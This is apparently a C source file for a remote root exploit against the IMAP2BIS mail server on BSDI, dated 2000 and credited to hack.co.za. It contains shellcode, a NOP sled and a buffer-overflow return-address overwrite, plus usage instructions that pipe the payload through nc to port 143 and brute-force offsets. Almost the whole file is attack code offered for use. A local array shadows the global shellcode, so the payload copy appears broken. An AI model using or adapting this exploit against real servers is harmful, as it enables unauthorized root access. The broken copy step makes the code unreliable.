/*
 
  BSDI IMAP2BIS remote root exploit
 
  Usage:   (./imapx <offset>;cat)| nc targethost 143
           
             where offset = -1000..1000  (brute force if 0 doesnt work) 
 
  Note:
          if you plan to port this to other OS., make sure the
          shellcode doesn't contain lower case chars since imapd
          will toupper() the shellcode, thus fucking it up.
  Note:
          I tested this on a few system's and found this offsets vulnerable
 
*/

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 4092
#define NOP 0x90

char shell[] =

  "\xeb\x58\x5e"
  "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
  "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
  "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
  "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
  "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
  "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
  "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
  "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
  "\x42\x49\x4e\x2f\x53\x48\x00";

void
main (int argc, char *argv[])
{
  char buf[BUFLEN];
  int offset,nop,i;
  unsigned long esp;
  char shell[1024+300];

  fprintf(stderr,"usage: %s <offset>\n", argv[0]);

  nop = 403;
  esp = 0xefbfd5e8;
  offset = atoi(argv[1]);

  memset(buf, NOP, BUFLEN);
  memcpy(buf+(long)nop, shell, strlen(shell));

  for (i = 1024; i < BUFLEN - 3; i += 2)
    {
      *((int *) &buf[i]) = esp + (long) offset;
      shell[ sizeof(shell)-1 ] = 0;
    }

  printf("{%d} AUTH\r\n", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);

  printf("\r\n");

  return;
}
/*                    www.hack.co.za              [2000]*/